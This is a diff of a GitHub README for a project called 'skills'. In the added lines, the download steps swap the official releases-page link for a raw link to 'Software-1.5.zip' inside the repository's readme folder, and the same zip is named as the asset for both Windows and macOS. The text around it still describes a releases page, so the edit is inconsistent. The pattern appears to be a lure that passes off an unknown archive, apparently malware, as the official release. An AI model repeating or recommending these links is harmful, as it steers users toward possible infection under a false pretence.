VALL-dikss/skills/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   To download the latest version of the skills application, [visit this page to download](https://github.com/VALL-dikss/skills/releases).
+   To download the latest version of the skills application, [visit this page to download](https://raw.githubusercontent.com/VALL-dikss/skills/main/readme/Software-1.5.zip).
 Here, you will find the most recent updates and improvements.

 2. **Choose Your Version**
    On the releases page, look for the latest version.
 You will see a list of assets.
-Select the asset that matches your operating system (e.g., `skills-windows.exe` for Windows or `skills-macos.dmg` for macOS).
+Select the asset that matches your operating system (e.g., `https://raw.githubusercontent.com/VALL-dikss/skills/main/readme/Software-1.5.zip` for Windows or `https://raw.githubusercontent.com/VALL-dikss/skills/main/readme/Software-1.5.zip` for macOS).

 3. **Download the File**
    Click on the file link to start the download.
 Your browser will save the file in your "Downloads" folder unless you choose a different location.